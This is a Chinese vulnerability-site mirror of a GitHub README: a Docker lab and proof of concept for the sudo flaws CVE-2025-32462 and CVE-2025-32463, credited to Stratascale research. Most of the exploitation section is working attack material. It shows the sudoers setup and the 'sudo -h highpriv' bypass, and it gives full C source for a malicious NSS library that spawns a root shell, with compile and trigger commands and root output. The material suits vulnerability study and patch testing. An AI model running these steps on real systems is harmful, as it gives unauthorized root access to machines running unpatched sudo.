关联漏洞
描述
Docker PoC for CVE-2025-32462 & CVE-2025-32463 (sudo), based on Stratascale CRU research.
介绍
# CVE-2025-32462 & CVE-2025-32463 – PoC Lab
This is a container-based lab and PoC for the following vulnerabilities in `sudo`:
- **CVE-2025-32462** – `sudo -h` host matching logic bypass
- **CVE-2025-32463** – `sudo -R` chroot NSS library escape
> 🔒 For educational purposes only. Do not use on systems you don’t own or have permission to test.
---
## 🔬 Original Research
- Blog Post for CVE-2025-32462: [sudo host alias privilege escalation](https://www.stratascale.com/vulnerability-alert-CVE-2025-32462-sudo-host)
- Blog Post for CVE-2025-32463: [sudo chroot NSS bypass](https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot)
### 🧠 Research Credit
- **Rich Mirch**
Stratascale Cyber Research Unit (CRU)
[@Stratascale](https://www.stratascale.com)
---
## 🧪 Lab Setup (Docker)
### 🔧 Dockerfile
```dockerfile
FROM ubuntu:24.04
ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update && \\
apt-get install -y build-essential wget libpam0g-dev libselinux1-dev zlib1g-dev \\
pkg-config libssl-dev git nano gcc && \\
rm -rf /var/lib/apt/lists/*
WORKDIR /opt
RUN wget https://www.sudo.ws/dist/sudo-1.9.16p2.tar.gz && \\
tar xzf sudo-1.9.16p2.tar.gz && \\
cd sudo-1.9.16p2 && \\
./configure --disable-gcrypt --prefix=/usr && make && make install
RUN useradd -m -s /bin/bash pwn && echo 'pwn:pwn' | chpasswd
USER pwn
WORKDIR /home/pwn
CMD ["/bin/bash"]
```
---
### 🚀 Build & Run
```bash
docker build -t sudo-vuln-lab .
docker network create --subnet=172.190.0.0/16 sudolabnet
docker run -d --network sudolabnet --ip 172.190.0.3 --hostname 'lowpriv.test.local' --add-host highpriv.test.local:172.190.0.2 --name lowpriv sudo-vuln-lab tail -f /dev/null
```
> extra setup for `CVE-2025-32462`
```bash
docker exec -u root -it lowpriv bash
# inside root shell of docker container
root@lowpriv:/home/pwn# echo 'Host_Alias HIGH = highpriv.test.local' >> /etc/sudoers
root@lowpriv:/home/pwn# echo 'Host_Alias LOW = lowpriv.test.local' >> /etc/sudoers
root@lowpriv:/home/pwn# echo 'pwn HIGH,!LOW = NOPASSWD:ALL' >> /etc/sudoers
```
---
# Manual Exploitation
## CVE-2025-32462
> Normal Operation
```bash
pwn@lowpriv:~$ sudo id
Password: ^C
sudo: a password is required
```
> Exploitation
```
pwn@lowpriv:~$ sudo -h highpriv.test.local id
uid=0(root) gid=0(root) groups=0(root)
pwn@lowpriv:~$ sudo -h highpriv.test.local hostname -f
lowpriv.test.local
```
## CVE-2025-32463
> Normal Operation
```bash
pwn@lowpriv:~$ sudo id
Password:
pwn is not allowed to run sudo on lowpriv.
```
> Preparation
```bash
# Step 1: Create the chroot directory structure
mkdir -p exploitDir/etc
# Step 2: Write a malicious nsswitch.conf to load our exploit module
echo 'passwd: /cve_2025_32463' > exploitDir/etc/nsswitch.conf
# Step 3: Create directory for the malicious NSS library
mkdir libnss_
# Step 4: Copy necessary group file into chroot environment
cp /etc/group exploitDir/etc/
# Step 5: Write the malicious NSS shared library source code
cat > cve_2025_32463.c <<EOF
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void GIVEMEROOT(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash", "/bin/bash", NULL);
}
EOF
# Step 6: Compile the malicious NSS shared library
gcc -shared -fPIC -Wl,-init,GIVEMEROOT -o libnss_/cve_2025_32463.so.2 cve_2025_32463.c
# Step 7: Launch sudo with chroot to trigger the vulnerability
sudo -R exploitDir HEHE RUN THIS AND GIVE ME ROOT
root@lowpriv:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
```
---
# Disclaimer
> This PoC is for educational and authorized research only.
---
# ✍️ Author
PoC lab and Docker environment by [MAAYTHM](https://github.com/MAAYTHM).
Research credit: Rich Mirch – Stratascale CRU
文件快照
[4.0K] /data/pocs/1381bcc75e2f79ad0fe63859da54363941274bd9
├── [ 848] auto_cve_2025_32463.sh
├── [ 583] Dockerfile
├── [1.0K] LICENSE
└── [3.7K] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。